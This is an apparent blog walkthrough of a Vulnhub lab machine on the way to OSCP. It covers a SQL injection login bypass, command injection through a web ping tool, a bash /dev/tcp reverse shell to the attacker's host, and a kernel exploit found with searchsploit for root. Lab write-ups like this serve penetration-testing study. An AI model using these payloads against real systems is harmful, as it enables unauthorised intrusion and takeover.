Vulnhub virtual machine; On the path to OSCP this box offered SQL-injection for login and a client side web application that was able to be manipulated to give a foothold to box. Classic enumeration of box to compile a priv-esc.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Find target on network
DoS is not useful in this scenario.
Navigate to webpage
Test for SQL injection
username: admin' OR '1=1--
Successful injection! We are now face with some sort of client side PING tester.
Testing a ping for localhost
Looks like we have successful command execution on box.
Remote Code Execution
Attempt to grab the passwd file by submitting:
we are ‘apache’.
Setup Listener on port 9000
Attempt to setup a reverse connection with an easy one liner
/bin/bash -i >& /dev/tcp/[ip_address]/[port] 0>&1
how it works:
*bash -i>&*: invoke bash with an interactive option
*/dev/tcp/[localhost]/9000*: redirect the session with the /dev/tcp device file
*0>&1*: use the standard output and redirect it to the standard input
connection established to box and we are ‘apache’.
Upgrade Half Shell to Full Shell Test for which python
Investigate the environment
Running CentOS release 4.5 and Linux 2.6.9-55
check searchsploit for vulnerabilties:
Interesting hit with Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10)
Mirror exploit to directory
Investigate/search for any random shell code and replace if needed.
Get file over to target box with a SimpleHTTPServer
Save file to memory of box as a good habit located at:
Compile on box:
Change the chmod of the file
chmod 755 exploit
Bring me the root!